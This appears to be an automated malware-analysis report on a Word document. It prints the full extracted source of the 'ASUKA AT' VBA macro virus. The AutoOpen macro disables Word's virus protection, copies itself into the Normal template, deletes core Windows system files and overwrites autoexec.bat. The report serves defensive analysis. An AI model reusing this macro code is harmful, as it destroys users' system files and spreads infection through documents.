MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen subroutine, indicating it's designed to execute automatically when the document is opened. The macro attempts to disable virus protection and create a malicious 'c:\autoexec.bat' file, which would execute the 'ASUKA AT' payload. This suggests a classic macro-based malware delivery mechanism.
Heuristics 3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3203 bytes |
SHA-256: 31e73b283619827e9b0b519dc0d5d8f525cdcc8ca5aaee71bc784db0708a68e6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Módulo1"
Private Declare Function Donde_esta_Windowsdirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Sub AutoOpen()
Options.VirusProtection = False
System.ProfileString("Options", "EnableMacroVirusProtection") = "0"
ShowVisualBasicEditor = False
Dim DirName As String
Dim Shinji As String
DirName = Donde_esta_Windows()
Shinji = DirName
On Error GoTo RutinaDeError
ActiveDocument.SaveAs FileName:=NormalTemplate.Path & "\" & NormalTemplate.Name, FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
Kill (Shinji + "command.com")
Kill (Shinji + "winfile.exe")
Kill (Shinji + "\system\appwiz.cpl")
Kill (Shinji + "\system\sysdm.cpl")
'aca van los archivos: c:\windows\explorer.exe, c:\windows\winfile.exe, c:\windows\command.com, c:\windows\system\appwiz.cpl, c:\windows\system\sysdm.cpl, acuerdate de poner Shinji
Open "c:\autoexec.bat" For Output As #1
Print #1, "@echo off"
Print #1, "cls"
Print #1, "ECHO *********************************************************"
Print #1, "ECHO * *"
Print #1, "ECHO * ViRuS: ASUKA AT *"
Print #1, "ECHO * *"
Print #1, "ECHO * AUTOR: *"
Print #1, "ECHO * *"
Print #1, "ECHO * ©©©© ZaHACKieL ©©©© *"
Print #1, "ECHO * *"
Print #1, "ECHO * LIMA - PERU *"
Print #1, "ECHO * *"
Print #1, "ECHO * 03/JUN/00 *"
Print #1, "ECHO * *"
Print #1, "ECHO * ®®®®®®®®®®®®®® *"
Print #1, "ECHO * § § *"
Print #1, "ECHO * § A.B.G § *"
Print #1, "ECHO *********************************************************"
Print #1, "pause"
Close #1
Application.Visible = False
RutinaDeError:
Exit Sub
End Sub
Function Donde_esta_Windows() As String
Dim Temp As String
Dim Ret As Long
Const MAX_LENGTH = 145
Temp = String$(MAX_LENGTH, 0)
Ret = Donde_esta_Windowsdirectory(Temp, MAX_LENGTH)
Temp = Left$(Temp, Ret)
If Temp <> "" And Right$(Temp, 1) <> "\" Then
Donde_esta_Windows = Temp & "\"
Else
Donde_esta_Windows = Temp
End If
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.